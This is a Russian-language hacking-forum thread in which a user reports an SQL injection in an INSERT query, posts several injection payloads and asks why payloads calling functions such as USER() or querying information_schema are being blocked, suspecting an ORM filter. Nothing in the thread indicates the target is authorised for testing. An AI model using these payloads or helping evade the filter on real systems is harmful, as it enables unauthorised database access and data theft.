Старый 13.11.2019, 16:28   #1
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 151
Репутация: 25
По умолчанию Странная SQLi в INSERT

Нашёл простейшую SQLi в INSERT типа такого:
Цитата:
INSERT INTO table (col1, col2, col3) VALUES('a', '[INJ_HERE]', 'c')
Беру такой пейлод:
Цитата:
', 'sometext'); --
Запись с "sometext" отлично добавляется в базу и её видно в веб-морде.
Аналогично
Цитата:
', (SELECT 'sometext')); --
Однако пейлоды с функциями и табличками внутри не работают (вывода ошибок нет)
Цитата:
', (SELECT USER())); --
Цитата:
', (SELECT COUNT(*) FROM inforation_schema.TABLES)); --
Работает вот так:
Цитата:
', (SELECT COUNT(*) FROM (SELECT 1)a)); --
Подумал что вырезаются функции стандартные типа USER(), VERSION(), DATABASE(). Однако если их заключить в кавычки, то ничего не режется:
Цитата:
', (SELECT 'USER()')); --
Пробовал и простые типа CURTIME() - та же история.

В чём может быть причина? Ни разу такого поведения не встречал.
Белый Тигр вне форума   Ответить с цитированием
Старый 14.11.2019, 11:34   #2
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 151
Репутация: 25
По умолчанию

Новая инфа - это инъекция одновременно в SELECT и INSERT . Первое перед вторым.
Есть догадка что запрос идёт через какую-то ORM, которая пытается изменять запрос и глушит вызовы функций.
Одинаково не работают VERSION(), VersION(), VeRsion ( ). Ну и вообще все функции - ASCII, CHAR, ... .
Белый Тигр вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot